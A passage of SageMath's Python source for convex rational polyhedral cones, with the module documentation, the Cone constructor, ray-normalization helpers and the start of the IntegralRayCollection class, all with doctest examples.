] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Convex rational polyhedral cones
This module was designed as a part of framework for toric varieties
(:mod:`~sage.schemes.toric.variety`,
:mod:`~sage.schemes.toric.fano_variety`). While the emphasis is on
strictly convex cones, non-strictly convex cones are supported as well. Work
with distinct lattices (in the sense of discrete subgroups spanning vector
spaces) is supported. The default lattice is :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>` `N` of the appropriate
dimension. The only case when you must specify lattice explicitly is creation
of a 0-dimensional cone, where dimension of the ambient space cannot be
guessed.
AUTHORS:
- Andrey Novoseltsev (2010-05-13): initial version.
- Andrey Novoseltsev (2010-06-17): substantial improvement during review by
Volker Braun.
- Volker Braun (2010-06-21): various spanned/quotient/dual lattice
computations added.
- Volker Braun (2010-12-28): Hilbert basis for cones.
- Andrey Novoseltsev (2012-02-23): switch to PointCollection container.
EXAMPLES:
Use :func:`Cone` to construct cones::
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: halfspace = Cone([(1,0,0), (0,1,0), (-1,-1,0), (0,0,1)])
sage: positive_xy = Cone([(1,0,0), (0,1,0)])
sage: four_rays = Cone([(1,1,1), (1,-1,1), (-1,-1,1), (-1,1,1)])
For all of the cones above we have provided primitive generating rays, but in
fact this is not necessary - a cone can be constructed from any collection of
rays (from the same space, of course). If there are non-primitive (or even
non-integral) rays, they will be replaced with primitive ones. If there are
extra rays, they will be discarded. Of course, this means that :func:`Cone`
has to do some work before actually constructing the cone and sometimes it is
not desirable, if you know for sure that your input is already "good". In this
case you can use options ``check=False`` to force :func:`Cone` to use
exactly the directions that you have specified and ``normalize=False`` to
force it to use exactly the rays that you have specified. However, it is
better not to use these possibilities without necessity, since cones are
assumed to be represented by a minimal set of primitive generating rays.
See :func:`Cone` for further documentation on construction.
Once you have a cone, you can perform numerous operations on it. The most
important ones are, probably, ray accessing methods::
sage: rays = halfspace.rays()
sage: rays
N( 0, 0, 1),
N( 0, 1, 0),
N( 0, -1, 0),
N( 1, 0, 0),
N(-1, 0, 0)
in 3-d lattice N
sage: rays.set()
frozenset({N(-1, 0, 0), N(0, -1, 0), N(0, 0, 1), N(0, 1, 0), N(1, 0, 0)})
sage: rays.matrix()
[ 0 0 1]
[ 0 1 0]
[ 0 -1 0]
[ 1 0 0]
[-1 0 0]
sage: rays.column_matrix()
[ 0 0 0 1 -1]
[ 0 1 -1 0 0]
[ 1 0 0 0 0]
sage: rays(3)
N(1, 0, 0)
in 3-d lattice N
sage: rays[3]
N(1, 0, 0)
sage: halfspace.ray(3)
N(1, 0, 0)
The method :meth:`~IntegralRayCollection.rays` returns a
:class:`~sage.geometry.point_collection.PointCollection` with the
`i`-th element being the primitive integral generator of the `i`-th
ray. It is possible to convert this collection to a matrix with either
rows or columns corresponding to these generators. You may also change
the default
:meth:`~sage.geometry.point_collection.PointCollection.output_format`
of all point collections to be such a matrix.
If you want to do something with each ray of a cone, you can write ::
sage: for ray in positive_xy: print(ray)
N(1, 0, 0)
N(0, 1, 0)
There are two dimensions associated to each cone - the dimension of the
subspace spanned by the cone and the dimension of the space where it lives::
sage: positive_xy.dim()
2
sage: positive_xy.lattice_dim()
3
You also may be interested in this dimension::
sage: dim(positive_xy.linear_subspace())
0
sage: dim(halfspace.linear_subspace())
2
Or, perhaps, all you care about is whether it is zero or not::
sage: positive_xy.is_strictly_convex()
True
sage: halfspace.is_strictly_convex()
False
You can also perform these checks::
sage: positive_xy.is_simplicial()
True
sage: four_rays.is_simplicial()
False
sage: positive_xy.is_smooth()
True
You can work with subcones that form faces of other cones::
sage: face = four_rays.faces(dim=2)[0]
sage: face
2-d face of 3-d cone in 3-d lattice N
sage: face.rays()
N(-1, -1, 1),
N(-1, 1, 1)
in 3-d lattice N
sage: face.ambient_ray_indices()
(2, 3)
sage: four_rays.rays(face.ambient_ray_indices())
N(-1, -1, 1),
N(-1, 1, 1)
in 3-d lattice N
If you need to know inclusion relations between faces, you can use ::
sage: L = four_rays.face_lattice()
sage: [len(s) for s in L.level_sets()]
[1, 4, 4, 1]
sage: face = L.level_sets()[2][0]
sage: face.rays()
N(1, 1, 1),
N(1, -1, 1)
in 3-d lattice N
sage: L.hasse_diagram().neighbors_in(face)
[1-d face of 3-d cone in 3-d lattice N,
1-d face of 3-d cone in 3-d lattice N]
.. WARNING::
The order of faces in level sets of
the face lattice may differ from the order of faces returned by
:meth:`~ConvexRationalPolyhedralCone.faces`. While the first order is
random, the latter one ensures that one-dimensional faces are listed in
the same order as generating rays.
When all the functionality provided by cones is not enough, you may want to
check if you can do necessary things using polyhedra corresponding to cones::
sage: four_rays.polyhedron()
A 3-dimensional polyhedron in ZZ^3 defined as
the convex hull of 1 vertex and 4 rays
And of course you are always welcome to suggest new features that should be
added to cones!
REFERENCES:
- [Ful1993]_
"""
# ****************************************************************************
# Copyright (C) 2010-2014 Volker Braun <vbraun.name@gmail.com>
# Copyright (C) 2010-2018 Andrey Novoseltsev <novoselt@gmail.com>
# Copyright (C) 2010 William Stein <wstein@gmail.com>
# Copyright (C) 2012 Christian Stump
# Copyright (C) 2014-2018 Frédéric Chapoton
# Copyright (C) 2014 Peter Bruin
# Copyright (C) 2015-2017 Jori Mäntysalo
# Copyright (C) 2015-2020 Michael Orlitzky
# Copyright (C) 2016-2020 John H. Palmieri
# Copyright (C) 2018 David Coudert
# Copyright (C) 2019-2020 Jonathan Kliem
# Copyright (C) 2020-2021 Matthias Koeppe
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from collections.abc import Hashable, Iterable, Container
from copy import copy
from warnings import warn
from sage.arith.all import gcd, lcm
from sage.combinat.posets.posets import FinitePoset
from sage.geometry.point_collection import PointCollection
from sage.geometry.polyhedron.constructor import Polyhedron
from sage.geometry.polyhedron.base import is_Polyhedron
from sage.geometry.hasse_diagram import lattice_from_incidences
from sage.geometry.toric_lattice import (ToricLattice, is_ToricLattice,
is_ToricLatticeQuotient)
from sage.geometry.toric_plotter import ToricPlotter, label_list
from sage.geometry.relative_interior import RelativeInterior
from sage.graphs.digraph import DiGraph
from sage.matrix.constructor import matrix
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.special import column_matrix
from sage.misc.cachefunc import cached_method
from sage.misc.flatten import flatten
from sage.misc.latex import latex
from sage.modules.free_module import span, VectorSpace
from sage.modules.free_module_element import vector
from sage.rings.integer_ring import ZZ
from sage.rings.rational_field import QQ
from sage.structure.all import SageObject, parent
from sage.structure.richcmp import richcmp_method, richcmp
from sage.geometry.integral_points import parallelotope_points
from sage.geometry.convex_set import ConvexSet_closed
import sage.geometry.abc
from sage.misc.lazy_import import lazy_import
from sage.features import PythonModule
lazy_import('ppl', ['C_Polyhedron', 'Generator_System', 'Constraint_System',
'Linear_Expression', 'Poly_Con_Relation'],
feature=PythonModule("ppl", spkg="pplpy"))
lazy_import('ppl', ['ray', 'point'], as_=['PPL_ray', 'PPL_point'],
feature=PythonModule("ppl", spkg="pplpy"))
def is_Cone(x):
r"""
Check if ``x`` is a cone.
INPUT:
- ``x`` -- anything.
OUTPUT:
- ``True`` if ``x`` is a cone and ``False`` otherwise.
EXAMPLES::
sage: from sage.geometry.cone import is_Cone
sage: is_Cone(1)
False
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant
2-d cone in 2-d lattice N
sage: is_Cone(quadrant)
True
"""
return isinstance(x, ConvexRationalPolyhedralCone)
def Cone(rays, lattice=None, check=True, normalize=True):
r"""
Construct a (not necessarily strictly) convex rational polyhedral cone.
INPUT:
- ``rays`` -- a list of rays. Each ray should be given as a list
or a vector convertible to the rational extension of the given
``lattice``. May also be specified by a
:class:`~sage.geometry.polyhedron.base.Polyhedron_base` object;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If not specified, an attempt will
be made to determine an appropriate toric lattice automatically;
- ``check`` -- by default the input data will be checked for
correctness (e.g. that all rays have the same number of
components) and generating rays will be constructed from
``rays``. If you know that the input is a minimal set of
generators of a valid cone, you may significantly decrease
construction time using ``check=False`` option;
- ``normalize`` -- you can further speed up construction using
``normalize=False`` option. In this case ``rays`` must be a list of
immutable primitive rays in ``lattice``. In general, you should not use
this option, it is designed for code optimization and does not give as
drastic improvement in speed as the previous one.
OUTPUT:
- convex rational polyhedral cone determined by ``rays``.
EXAMPLES:
Let's define a cone corresponding to the first quadrant of the plane
(note, you can even mix objects of different types to represent rays, as
long as you let this function to perform all the checks and necessary
conversions!)::
sage: quadrant = Cone([(1,0), [0,1]])
sage: quadrant
2-d cone in 2-d lattice N
sage: quadrant.rays()
N(1, 0),
N(0, 1)
in 2-d lattice N
If you give more rays than necessary, the extra ones will be discarded::
sage: Cone([(1,0), (0,1), (1,1), (0,1)]).rays()
N(0, 1),
N(1, 0)
in 2-d lattice N
However, this work is not done with ``check=False`` option, so use it
carefully! ::
sage: Cone([(1,0), (0,1), (1,1), (0,1)], check=False).rays()
N(1, 0),
N(0, 1),
N(1, 1),
N(0, 1)
in 2-d lattice N
Even worse things can happen with ``normalize=False`` option::
sage: Cone([(1,0), (0,1)], check=False, normalize=False)
Traceback (most recent call last):
...
AttributeError: 'tuple' object has no attribute 'parent'
You can construct different "not" cones: not full-dimensional, not
strictly convex, not containing any rays::
sage: one_dimensional_cone = Cone([(1,0)])
sage: one_dimensional_cone.dim()
1
sage: half_plane = Cone([(1,0), (0,1), (-1,0)])
sage: half_plane.rays()
N( 0, 1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
sage: half_plane.is_strictly_convex()
False
sage: origin = Cone([(0,0)])
sage: origin.rays()
Empty collection
in 2-d lattice N
sage: origin.dim()
0
sage: origin.lattice_dim()
2
You may construct the cone above without giving any rays, but in this case
you must provide ``lattice`` explicitly::
sage: origin = Cone([])
Traceback (most recent call last):
...
ValueError: lattice must be given explicitly if there are no rays!
sage: origin = Cone([], lattice=ToricLattice(2))
sage: origin.dim()
0
sage: origin.lattice_dim()
2
sage: origin.lattice()
2-d lattice N
However, the trivial cone in ``n`` dimensions has a predefined
constructor for you to use::
sage: origin = cones.trivial(2)
sage: origin.rays()
Empty collection
in 2-d lattice N
Of course, you can also provide ``lattice`` in other cases::
sage: L = ToricLattice(3, "L")
sage: c1 = Cone([(1,0,0),(1,1,1)], lattice=L)
sage: c1.rays()
L(1, 0, 0),
L(1, 1, 1)
in 3-d lattice L
Or you can construct cones from rays of a particular lattice::
sage: ray1 = L(1,0,0)
sage: ray2 = L(1,1,1)
sage: c2 = Cone([ray1, ray2])
sage: c2.rays()
L(1, 0, 0),
L(1, 1, 1)
in 3-d lattice L
sage: c1 == c2
True
When the cone in question is not strictly convex, the standard form for
the "generating rays" of the linear subspace is "basis vectors and their
negatives", as in the following example::
sage: plane = Cone([(1,0), (0,1), (-1,-1)])
sage: plane.rays()
N( 0, 1),
N( 0, -1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
The cone can also be specified by a
:class:`~sage.geometry.polyhedron.base.Polyhedron_base`::
sage: p = plane.polyhedron()
sage: Cone(p)
2-d cone in 2-d lattice N
sage: Cone(p) == plane
True
TESTS::
sage: N = ToricLattice(2)
sage: Nsub = N.span([ N(1,2) ])
sage: Cone(Nsub.basis())
1-d cone in Sublattice <N(1, 2)>
sage: Cone([N(0)])
0-d cone in 2-d lattice N
"""
# Cone from Polyhedron
if is_Polyhedron(rays):
polyhedron = rays
if lattice is None:
lattice = ToricLattice(polyhedron.ambient_dim())
if polyhedron.n_vertices() > 1:
raise ValueError("%s is not a cone!" % polyhedron)
apex = polyhedron.vertices()[0]
if apex.count(0) != len(apex):
raise ValueError("the apex of %s is not at the origin!"
% polyhedron)
rays = normalize_rays(polyhedron.rays(), lattice)
for line in normalize_rays(polyhedron.lines(), lattice):
rays.append(line)
rays.append(-line)
rays[-1].set_immutable()
return ConvexRationalPolyhedralCone(rays, lattice)
# Cone from rays
if check or normalize:
rays = normalize_rays(rays, lattice)
if lattice is None:
if rays:
lattice = rays[0].parent()
else:
raise ValueError(
"lattice must be given explicitly if there are no rays!")
if not check or not rays:
return ConvexRationalPolyhedralCone(rays, lattice)
# Any set of rays forms a cone, but we want to keep only generators
if is_ToricLatticeQuotient(lattice):
gs = Generator_System(
PPL_point(Linear_Expression(lattice(0).vector(), 0)))
for r in rays:
if not r.is_zero():
gs.insert(PPL_ray(Linear_Expression(r.vector(), 0)))
else:
gs = Generator_System( PPL_point(Linear_Expression(lattice(0),0)) )
for r in rays:
if not r.is_zero():
gs.insert( PPL_ray(Linear_Expression(r,0)) )
cone = C_Polyhedron(gs)
return _Cone_from_PPL(cone, lattice, rays)
def _Cone_from_PPL(cone, lattice, original_rays=None):
r"""
Construct a cone from a :class:`~ppl.polyhedron.Polyhedron`.
This is a private function and not intended to be exposed to the
end user. It is used internally by :func:`Cone` and in
:meth:`ConvexRationalPolyhedralCone.intersection`.
INPUT:
- ``cone`` -- a :class:`~ppl.polyhedron.Polyhedron` having the
origin as its single point.
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these.
- ``original_rays`` -- (default: ``None``) if given, must be a minimal list
of normalized generating rays of ``cone``. If ``cone`` is strictly convex
and ``original_rays`` were given, they will be used as internal rays of
the constructed cone, in the given order.
OUTPUT:
A :class:`ConvexRationalPolyhedralCone`.
TESTS::
sage: Cone([(1,0), (0,1), (1,1), (0,1)]).rays() # indirect doctest
N(0, 1),
N(1, 0)
in 2-d lattice N
"""
rays = []
lines = []
for g in cone.minimized_generators():
if g.is_ray():
rays.append(g)
if g.is_line():
lines.append(g)
if (original_rays is not None and not lines and
len(rays) == len(original_rays)):
return ConvexRationalPolyhedralCone(original_rays, lattice, PPL=cone)
else:
rays = [ray.coefficients() for ray in rays]
for line in lines:
rays.append(line.coefficients())
rays.append(-vector(ZZ, rays[-1]))
try:
for i, ray in enumerate(rays):
rays[i] = lattice(ray)
rays[i].set_immutable()
except TypeError:
rays = normalize_rays(rays, lattice)
return ConvexRationalPolyhedralCone(rays, lattice, PPL=cone)
def _ambient_space_point(body, data):
r"""
Try to convert ``data`` to a point of the ambient space of ``body``.
INPUT:
- ``body`` -- a cone, fan, or lattice polytope with ``lattice()`` method
- ``data`` -- anything
OUTPUT:
An integral, rational, real algebraic, or numeric point of the
ambient space of ``body`` is returned if ``data`` were
successfully interpreted in such a way. A ``TypeError`` is raised
otherwise.
TESTS::
sage: from sage.geometry.cone import _ambient_space_point
sage: c = Cone([(1,0), (0,1)])
sage: _ambient_space_point(c, [1,1])
N(1, 1)
sage: _ambient_space_point(c, vector(ZZ,[1,1]))
N(1, 1)
sage: _ambient_space_point(c, c.dual_lattice()([1,1]))
Traceback (most recent call last):
...
TypeError: the point M(1, 1) and
2-d cone in 2-d lattice N have incompatible lattices
sage: _ambient_space_point(c, [1,1/3])
(1, 1/3)
sage: _ambient_space_point(c, vector(QQ,[1,1/3]))
(1, 1/3)
sage: _ambient_space_point(c, [1/2,1/sqrt(3)])
(1/2, 0.5773502691896258?)
sage: _ambient_space_point(c, vector(AA,[1/2,1/sqrt(3)]))
(1/2, 0.5773502691896258?)
sage: _ambient_space_point(c, [1,1,3])
Traceback (most recent call last):
...
TypeError: [1, 1, 3] does not represent a valid point
in the ambient space of 2-d cone in 2-d lattice N
sage: _ambient_space_point(c, vector(ZZ,[1,1,3]))
Traceback (most recent call last):
...
TypeError: (1, 1, 3) does not represent a valid point
in the ambient space of 2-d cone in 2-d lattice N
Ensure that transcendental elements can, at the very least, be
represented numerically::
sage: from sage.geometry.cone import _ambient_space_point
sage: c = Cone([(1,0), (0,1)])
sage: _ambient_space_point(c, [1, pi])
(1.00000000000000, 3.14159265358979)
sage: _ambient_space_point(c, vector(SR,[1, pi]))
(1.00000000000000, 3.14159265358979)
"""
L = body.lattice()
def try_base_extend(ring):
# Factor out the "try this ring..." code that's repeated four
# times.
try:
return L.base_extend(ring)(data)
except TypeError:
pass
except ValueError as ex:
if str(ex).startswith("Cannot coerce"):
pass
# Special treatment for toric lattice elements
p = try_base_extend(ZZ)
if p is not None:
return p
if is_ToricLattice(parent(data)):
raise TypeError("the point %s and %s have incompatible "
"lattices" % (data, body))
# If we don't have a lattice element, try successively
# less-desirable ambient spaces until (as a last resort) we
# attempt a numerical representation.
from sage.rings.qqbar import AA
from sage.rings.real_mpfr import RR
for ring in [QQ, AA, RR]:
p = try_base_extend(ring)
if p is not None:
return p
# Raise TypeError with our own message
raise TypeError("%s does not represent a valid point in the ambient "
"space of %s" % (data, body))
def integral_length(v):
"""
Compute the integral length of a given rational vector.
INPUT:
- ``v`` -- any object which can be converted to a list of rationals
OUTPUT:
Rational number `r`` such that ``v = r * u``, where ``u`` is the
primitive integral vector in the direction of ``v``.
EXAMPLES::
sage: from sage.geometry.cone import integral_length
sage: integral_length([1, 2, 4])
1
sage: integral_length([2, 2, 4])
2
sage: integral_length([2/3, 2, 4])
2/3
"""
data = [QQ(e) for e in list(v)]
ns = [e.numerator() for e in data]
ds = [e.denominator() for e in data]
return gcd(ns) / lcm(ds)
def normalize_rays(rays, lattice):
r"""
Normalize a list of rational rays: make them primitive and immutable.
INPUT:
- ``rays`` -- list of rays which can be converted to the rational
extension of ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, an attempt will
be made to determine an appropriate toric lattice automatically.
OUTPUT:
- list of immutable primitive vectors of the ``lattice`` in the same
directions as original ``rays``.
EXAMPLES::
sage: from sage.geometry.cone import normalize_rays
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], None)
[N(0, 1), N(0, 1), N(3, 2), N(3, 14)]
sage: L = ToricLattice(2, "L")
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], L.dual())
[L*(0, 1), L*(0, 1), L*(3, 2), L*(3, 14)]
sage: ray_in_L = L(0,1)
sage: normalize_rays([ray_in_L, (0, 2), (3, 2), (5/7, 10/3)], None)
[L(0, 1), L(0, 1), L(3, 2), L(3, 14)]
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], ZZ^2)
[(0, 1), (0, 1), (3, 2), (3, 14)]
sage: normalize_rays([(0, 1), (0, 2), (3, 2), (5/7, 10/3)], ZZ^3)
Traceback (most recent call last):
...
TypeError: cannot convert (0, 1) to
Vector space of dimension 3 over Rational Field!
sage: normalize_rays([], ZZ^3)
[]
"""
if rays is None:
rays = []
try:
rays = list(rays)
except TypeError:
raise TypeError(
"rays must be given as a list or a compatible structure!"
"\nGot: %s" % rays)
if rays:
if lattice is None:
ray_parent = parent(rays[0])
lattice = (ray_parent if is_ToricLattice(ray_parent)
else ToricLattice(len(rays[0])))
if lattice.base_ring() is not ZZ:
raise TypeError("lattice must be a free module over ZZ")
# Are we dealing with a quotient lattice?
try:
if not lattice.is_torsion_free():
raise ValueError("cannot normalize rays of torsion quotients!")
except AttributeError:
pass
V = None
try:
if lattice.is_ambient():
# Handle the most common case efficiently.
V = lattice.base_extend(QQ)
length = integral_length
except AttributeError:
pass
if V is None:
# Use a more general, but slower way.
V = lattice.vector_space_span_of_basis(lattice.basis())
length = lambda ray: integral_length(V.coordinate_vector(ray))
for n, ray in enumerate(rays):
try:
if isinstance(ray, (list, tuple, V.element_class)):
ray = V(ray)
else:
ray = V(list(ray))
except TypeError:
raise TypeError("cannot convert %s to %s!" % (ray, V))
if ray.is_zero():
ray = lattice(0)
else:
ray = lattice(ray / length(ray))
ray.set_immutable()
rays[n] = ray
return rays
@richcmp_method
class IntegralRayCollection(SageObject, Hashable, Iterable):
r"""
Create a collection of integral rays.
.. WARNING::
No correctness check or normalization is performed on the input data.
This class is designed for internal operations and you probably should
not use it directly.
This is a base class for :class:`convex rational polyhedral cones
<ConvexRationalPolyhedralCone>` and :class:`fans
<sage.geometry.fan.RationalPolyhedralFan>`.
Ray collections are immutable, but they cache most of the returned values.
INPUT:
- ``rays`` -- list of immutable vectors in ``lattice``;
- ``lattice`` -- :class:`ToricLattice
<sage.geometry.toric_lattice.ToricLatticeFactory>`, `\ZZ^n`, or any
other object that behaves like these. If ``None``, it will be determined
as :func:`parent` of the first ray. Of course, this cannot be done if
there are no rays, so in this case you must give an appropriate
``lattice`` directly. Note that ``None`` is *not* the default value -
you always *must* give this argument explicitly, even if it is ``None``.
OUTPUT:
- collection of given integral rays.
"""
def __init__(self, rays, lattice):
r"""
See :class:`IntegralRayCollection` for documentation.
TESTS::
sage: from sage.geometry.cone import (
....: IntegralRayCollection)
sage: v = vector([1,0])
sage: v.set_immutable()
sage: c = IntegralRayCollection([v], ZZ^2)
sage: c = IntegralRayCollection([v], None)
sage: c.lattice() # Determined automatically
Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: c.rays()
(1, 0)
in Ambient free module of rank 2
over the principal ideal domain Integer Ring
sage: TestSuite(c).run()
"""
if lattice is None:
lattice = rays[0].parent()
self._rays = PointCollection(rays, lattice)
self._lattice = lattice
def __richcmp__(self, right, op):
r"""
Compare ``self`` and ``right``.
INPUT:
- ``right`` -- anything.
OUTPUT:
boolean
There is equality if ``right`` is of the same type as
``self``, they have the same ambient lattices, and their
rays are the same and listed in the same order.
TESTS::
sage: c1 = Cone([(1,0), (0,1)])
sage: c2 = Cone([(0,1), (1,0)])
sage: c3 = Cone([(0,1), (1,0)])
sage: c1 > c2
True
sage: c2 < c1
True
sage: c2 == c3
True
sage: c2 is c3
False
"""
if type(self) != type(right):
return NotImplemented
# We probably do need to have explicit comparison of lattices here
# since if one of the collections does not live in a toric lattice,
# comparison of rays may miss the difference.
return richcmp((self.lattice(), self.rays()),
(right.lattice(), right.rays()), op)
def __hash__(self):
r"""
Return the hash of ``self`` computed from rays.
OUTPUT:
- integer.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: hash(c) == hash(c)
True
"""
if "_hash" not in self.__dict__:
self._hash = hash(self._rays)
return self._hash
def __iter__(self):
r"""
Return an iterator over rays of ``self``.
OUTPUT:
- iterator.
TESTS::
sage: c = Cone([(1,0), (0,1)])
sage: for ray in c: print(ray)
N(1, 0)
N(0, 1)
"""
return iter(self._rays)
def cartesian_product(self, other, lattice=None):
r"""
Return the Cartesian product of ``self`` with ``other``.
INPUT:
- ``other`` -- an :class:`IntegralRayCollection`;
- ``lattice`` -- (optional) the ambient lattice for the result. By
default, the direct sum of the ambient lattices of ``self`` and
``other`` is constructed.
OUTPUT:
- an :class:`IntegralRayCollection`.
By the Cartesian product of ray collections `(r_0, \dots, r_{n-1})` and
`(s_0, \dots, s_{m-1})` we understand the ray collection of the form
`((r_0, 0), \dots, (r_{n-1}, 0), (0, s_0), \dots, (0, s_{m-1}))`, which
is suitable for Cartesian products of cones and fans. The ray order is
guaranteed to be as described.
EXAMPLES::
sage: c = Cone([(1,)])
sage: c.cartesian_product(c) # indirect doctest
2-d cone in 2-d lattice N+N
sage: _.rays()
N+N(1, 0),
N+N(0, 1)
in 2-d lattice N+N
"""
assert isinstance(other, IntegralRayCollection)
if lattice is None:
lattice = self.lattice().direct_sum(other.lattice())
suffix = [0] * other.lattice_dim()
rays = [lattice(list(r1) + suffix) for r1 in self.rays()]
prefix = [0] * self.lattice_dim()
rays.extend(lattice(prefix + list(r2)) for r2 in other.rays())
for r in rays:
r.set_immutable()
return IntegralRayCollection(rays, lattice)
def __neg__(self):
"""
Return the collection with opposite rays.
EXAMPLES::
sage: c = Cone([(1,1),(0,1)]); c
2-d cone in 2-d lattice N
sage: d = -c # indirect doctest
sage: d.rays()
N(-1, -1),
N( 0, -1)
in 2-d lattice N
"""
lattice = self.lattice()
rays = [-r1 for r1 in self.rays()]
for r in rays:
r.set_immutable()
return IntegralRayCollection(rays, lattice)
def dim(self):
r"""
Return the dimension of the subspace spanned by rays of ``self``.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice_dim()
2
sage: c.dim()
1
"""
if "_dim" not in self.__dict__:
self._dim = self.rays().matrix().rank()
return self._dim
def lattice(self):
r"""
Return the ambient lattice of ``self``.
OUTPUT:
- lattice.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice()
2-d lattice N
sage: Cone([], ZZ^3).lattice()
Ambient free module of rank 3
over the principal ideal domain Integer Ring
"""
return self._lattice
def ambient_vector_space(self, base_field=None):
r"""
Return the ambient vector space.
It is the ambient lattice (:meth:`lattice`) tensored with a field.
INPUT:
- ``base_field`` -- (default: the rationals) a field.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.ambient_vector_space()
Vector space of dimension 2 over Rational Field
sage: c.ambient_vector_space(AA)
Vector space of dimension 2 over Algebraic Real Field
"""
return self.lattice().vector_space(base_field=base_field)
@cached_method
def dual_lattice(self):
r"""
Return the dual of the ambient lattice of ``self``.
OUTPUT:
- lattice. If possible (that is, if :meth:`lattice` has a
``dual()`` method), the dual lattice is returned. Otherwise,
`\ZZ^n` is returned, where `n` is the dimension of :meth:`lattice`.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.dual_lattice()
2-d lattice M
sage: Cone([], ZZ^3).dual_lattice()
Ambient free module of rank 3
over the principal ideal domain Integer Ring
TESTS:
The dual lattice of the dual lattice of a random cone should be
the original lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10)
sage: K.dual_lattice().dual() is K.lattice()
True
"""
try:
return self.lattice().dual()
except AttributeError:
return ZZ**self.lattice_dim()
def lattice_dim(self):
r"""
Return the dimension of the ambient lattice of ``self``.
An alias is :meth:`ambient_dim`.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0)])
sage: c.lattice_dim()
2
sage: c.dim()
1
"""
return self.lattice().dimension()
ambient_dim = lattice_dim
def nrays(self):
r"""
Return the number of rays of ``self``.
OUTPUT:
- integer.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.nrays()
2
"""
return len(self._rays)
def plot(self, **options):
r"""
Plot ``self``.
INPUT:
- any options for toric plots (see :func:`toric_plotter.options
<sage.geometry.toric_plotter.options>`), none are mandatory.
OUTPUT:
- a plot.
EXAMPLES::
sage: quadrant = Cone([(1,0), (0,1)])
sage: quadrant.plot() # optional - sage.plot
Graphics object consisting of 9 graphics primitives
"""
tp = ToricPlotter(options, self.lattice().degree(), self.rays())
return tp.plot_lattice() + tp.plot_rays() + tp.plot_generators()
def ray(self, n):
r"""
Return the ``n``-th ray of ``self``.
INPUT:
- ``n`` -- integer, an index of a ray of ``self``. Enumeration of rays
starts with zero.
OUTPUT:
- ray, an element of the lattice of ``self``.
EXAMPLES::
sage: c = Cone([(1,0), (0,1)])
sage: c.ray(0)
N(1, 0)
"""
return self._rays[n]
def rays(self, *args):
r"""
Return (some of the) rays of ``self``.
INPUT:
- ``ray_list`` -- a list of integers, the indices of the requested
rays. If not specified, all rays of ``self`` will be returned.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`
of primitive integral ray generators.
EXAMPLES::
sage: c = Cone([(1,0), (0,1), (-1, 0)])
sage: c.rays()
N( 0, 1),
N( 1, 0),
N(-1, 0)
in 2-d lattice N
sage: c.rays([0, 2])
N( 0, 1),
N(-1, 0)
in 2-d lattice N
You can also give ray indices directly, without packing them into a
list::
sage: c.rays(0, 2)
N( 0, 1),
N(-1, 0)
in 2-d lattice N
"""
return self._rays if not args else self._rays(*args)
def codim(self):
r"""
Return the codimension of ``self``.
The codimension of a collection of rays (of a cone/fan) is the
difference between the dimension of the ambient space and the
dimension of the subspace spanned by those rays (of the cone/fan).
OUTPUT:
A nonnegative integer representing the codimension of ``self``.
.. SEEALSO::
:meth:`dim`, :meth:`lattice_dim`
EXAMPLES:
The codimension of the nonnegative orthant is zero, since the
span of its generators equals the entire ambient space::
sage: K = cones.nonnegative_orthant(3)
sage: K.codim()
0
However, if we remove a ray so that the entire cone is contained
within the `x`-`y` plane, then the resulting cone will have
codimension one, because the `z`-axis is perpendicular to every
element of the cone::
sage: K = Cone([(1,0,0), (0,1,0)])
sage: K.codim()
1
If our cone is all of `\mathbb{R}^{2}`, then its codimension is
zero::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: K.codim()
0
And if the cone is trivial in any space, then its codimension is
equal to the dimension of the ambient space::
sage: K = cones.trivial(0)
sage: K.lattice_dim()
0
sage: K.codim()
0
sage: K = cones.trivial(1)
sage: K.lattice_dim()
1
sage: K.codim()
1
sage: K = cones.trivial(2)
sage: K.lattice_dim()
2
sage: K.codim()
2
TESTS:
The codimension of a cone should be an integer between zero and
the dimension of the ambient space, inclusive::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: c = K.codim()
sage: c in ZZ
True
sage: 0 <= c <= K.lattice_dim()
True
A solid cone should have codimension zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8, solid = True)
sage: K.codim()
0
The codimension of a cone is equal to the lineality of its dual::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: K.codim() == K.dual().lineality()
True
"""
# same as ConvexSet_base.codim; the main point is the much more detailed
# docstring.
return (self.lattice_dim() - self.dim())
codimension = codim
def span(self, base_ring=None):
r"""
Return the span of ``self``.
INPUT:
- ``base_ring`` -- (default: from lattice) the base ring to use
for the generated module.
OUTPUT:
A module spanned by the generators of ``self``.
EXAMPLES:
The span of a single ray is a one-dimensional sublattice::
sage: K1 = Cone([(1,)])
sage: K1.span()
